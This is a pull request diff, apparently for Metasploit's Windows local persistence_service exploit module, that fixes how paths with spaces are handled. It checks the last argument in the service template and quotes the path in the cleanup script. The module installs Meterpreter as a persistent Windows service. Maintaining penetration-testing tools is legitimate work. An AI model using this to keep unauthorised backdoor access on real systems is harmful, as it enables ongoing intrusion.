### PR TITLE
Fix additional path space issues

### DIFF
--- a/data/exploits/persistence_service/service.erb
+++ b/data/exploits/persistence_service/service.erb
@@ -279,16 +279,16 @@ int main()
        argc++;
     }
 
-    if (argc == 2) {
+    if (argc > 1) {
 
-        if (strcmp(argv[1], <%= @install_cmd.inspect %>) == 0) {
+        if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
 
             // Installs and starts the service
 
             install_service();
             return 0;
         }
-        else if (strcmp(argv[1], <%= @start_cmd.inspect %>) == 0) {
+        else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
             // Starts the Meterpreter as a service
 
             start_service();

--- a/modules/exploits/windows/local/persistence_service.rb
+++ b/modules/exploits/windows/local/persistence_service.rb
@@ -126,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_good("Meterpreter service exe written to #{temprexe}")
 
     @clean_up_rc << "execute -H -i -f taskkill.exe -a \"/f /im #{rexename}\"\n" # Use interact to wait until the task ended.
-    @clean_up_rc << "rm #{temprexe.gsub("\\", "\\\\\\\\")}\n"
+    @clean_up_rc << "rm \"#{temprexe.gsub("\\", "\\\\\\\\")}\"\n"
 
     temprexe
   end


### PR DESCRIPTION
Additional code changes to handle paths with spaces.
The logic for install/start service now checks the last argument to account for how strtok breaks up the output from GetCommandLine.
This also quotes the path in the resource script that is used to remove the executable.